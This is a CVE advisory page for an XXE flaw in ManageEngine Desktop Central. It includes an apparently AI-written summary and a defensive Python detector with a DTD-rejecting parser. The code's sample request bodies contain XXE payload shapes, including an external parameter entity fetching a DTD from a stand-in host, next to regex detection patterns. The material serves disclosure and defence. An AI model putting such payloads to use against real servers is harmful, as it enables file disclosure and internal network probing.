VYPR
Unrated severity · NVD Advisory · Published Mar 11, 2020 · Updated Aug 4, 2024

CVE-2020-8540

Description

An XML external entity (XXE) vulnerability in Zoho ManageEngine Desktop Central before the 07-Mar-2020 update allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

An unauthenticated XXE vulnerability in Zoho ManageEngine Desktop Central before build 10.0.479 allows arbitrary file read and SSRF via a crafted DTD.

Vulnerability

Zoho ManageEngine Desktop Central before build 10.0.479 (the 07-Mar-2020 update) contains an XML External Entity (XXE) vulnerability in the agent servlet. The server parses XML input from managed agents and does not properly disable external entity resolution, allowing a remote attacker to inject a crafted DTD into an XML request. This affects all versions prior to the fixed build. [1]

Exploitation

An unauthenticated attacker with network access to the Desktop Central server can send a specially crafted XML payload containing an external entity reference to a malicious DTD. No prior authentication or special privileges are required; the attacker only needs to be able to reach the agent servlet endpoint. [1]

Impact

Successful exploitation allows the attacker to read arbitrary files from the server filesystem (information disclosure) and to perform server-side request forgery (SSRF) attacks, potentially probing internal network resources or interacting with other internal services. The CVSS severity is not explicitly stated in the available references, but the ability to read local files and perform SSRF constitutes a high-impact information disclosure and network-level risk.

Mitigation

The vulnerability was fixed in the 07-Mar-2020 update, corresponding to build 10.0.479 and above. Administrators should upgrade to the latest build by logging into the Desktop Central console, clicking the current build number on the top-right corner, and downloading the applicable latest build. No workaround is documented; applying the patch is the only mitigation. [1]
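The narrative above describes the mechanism (a DTD with an external entity reference arriving in an agent XML request) and the fix (upgrade). The following Python is an added example written for this page; it is not Zoho's code and not derived from the advisory's reference. It shows the two controls a defender can apply on their own side while patching: a detection pass over captured request bodies that flags DTDs carrying external entities, and a fail-closed parsing gate that refuses any document with a DOCTYPE before handing it to the parser. The agent element names, the `ws-0042` identifier and the `dtd-host.invalid` hostname are constructed sample values.

```python
import re
import xml.etree.ElementTree as ET

# Any DOCTYPE at all. Agent telemetry has no legitimate reason to carry a DTD,
# so its presence alone is a finding. Case-insensitive because crude filters
# that only look for "<!DOCTYPE" are commonly probed with mixed case.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)

# An entity declaration with an external identifier: SYSTEM or PUBLIC.
# Group 1 captures the "%" that marks a parameter entity (the form used to
# pull in a remote DTD); group 2 captures which identifier keyword was used.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?[^\s>]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE
)


def xxe_findings(body: str) -> list[str]:
    """Return detection labels for one XML request body (empty list = clean)."""
    findings = []
    if DOCTYPE_RE.search(body):
        findings.append("doctype-present")
    for match in ENTITY_RE.finditer(body):
        kind = "parameter-entity" if match.group(1) else "general-entity"
        findings.append(f"external-{kind}:{match.group(2).upper()}")
    return findings


def parse_agent_xml(body: str) -> ET.Element:
    """Parse an agent request, rejecting any document that declares a DTD.

    Refusing the DOCTYPE up front closes external entities, parameter entities
    and internal entity-expansion tricks in one step, independent of which
    parser features the underlying library happens to default to.
    """
    if DOCTYPE_RE.search(body):
        raise ValueError("DTD not permitted in agent requests")
    return ET.fromstring(body)


# Constructed sample request bodies (not captured traffic).
BENIGN_REQUEST = (
    '<?xml version="1.0"?>'
    "<agent><id>ws-0042</id><status>ok</status></agent>"
)

# A DTD that pulls in an external parameter entity, the shape the advisory
# describes as a "crafted DTD in an XML request".
CRAFTED_REQUEST = (
    '<?xml version="1.0"?>'
    "<!DOCTYPE agent ["
    '<!ENTITY % dtd SYSTEM "http://dtd-host.invalid/x.dtd"> %dtd;'
    "]>"
    "<agent><id>ws-0042</id></agent>"
)

# A general entity with a PUBLIC identifier, to show the other branch.
PUBLIC_ENTITY_REQUEST = (
    "<!DOCTYPE agent ["
    '<!ENTITY ext PUBLIC "-//sample//x" "http://dtd-host.invalid/y.dtd">'
    "]>"
    "<agent>&ext;</agent>"
)


def scan_requests(bodies: list[str]) -> dict[int, list[str]]:
    """Run the detector over a batch of request bodies; keyed by index."""
    return {i: f for i, b in enumerate(bodies) if (f := xxe_findings(b))}


if __name__ == "__main__":
    for idx, labels in scan_requests(
        [BENIGN_REQUEST, CRAFTED_REQUEST, PUBLIC_ENTITY_REQUEST]
    ).items():
        print(f"request {idx}: {', '.join(labels)}")
    print("benign agent id:", parse_agent_xml(BENIGN_REQUEST).findtext("id"))
```

The gate is deliberately fail-closed: a body whose CDATA text merely contains the string `<!DOCTYPE` is also rejected, which is the right trade-off for a machine-to-machine endpoint where a DTD is never expected. The detector is for triage of recorded traffic; it does not replace the vendor patch, since a server that has already parsed the request has already resolved the entity.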

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

References: 1

News mentions: 0